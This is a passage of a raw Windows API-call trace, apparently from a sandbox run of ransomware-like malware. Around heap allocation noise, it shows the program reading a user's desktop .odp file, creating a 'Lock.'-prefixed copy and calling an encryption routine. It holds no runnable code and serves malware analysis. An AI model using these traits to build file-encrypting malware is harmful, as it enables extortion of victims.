0x2e54e28 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0136.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0136.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0136.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0136.941] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0136.941] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0136.942] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0136.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0136.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0136.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0136.943] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.943] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.943] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0136.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e80330 [0136.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0136.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0136.944] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/AuSKwF8iMWxqYFgPtC.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\auskwf8imwxqyfgptc.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0136.944] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.944] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0136.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0136.944] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.944] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.944] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0136.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0136.945] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0136.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0136.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0136.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0136.945] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0136.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0136.945] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0136.945] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f06008 [0136.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0136.946] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0136.946] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.AuSKwF8iMWxqYFgPtC.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.auskwf8imwxqyfgptc.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0136.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c20 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0136.947] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0136.947] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.947] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0136.947] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0136.947] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0136.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0136.947] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0136.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0136.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0136.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0136.948] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0136.948] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x3bed020 [0136.997] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0136.997] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0136.999] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x5985, lpOverlapped=0x0) returned 1 [0137.000] ReadFile (in: hFile=0x2d0, lpBuffer=0x2e80330, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2e80330*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0137.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0137.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0137.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2f16010 [0137.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bed020 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0137.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0137.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0137.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2f2b9a0 [0137.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16010 | out: hHeap=0x970000) returned 1 [0137.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.008] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0137.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0137.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0137.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0137.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2f16010 [0137.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16010 | out: hHeap=0x970000) returned 1 [0137.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0137.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0137.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0137.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0137.010] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0137.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0137.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0137.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0137.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0137.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0137.011] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0137.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0137.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0137.011] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15985) returned 0x2f16010 [0137.013] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0137.013] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) 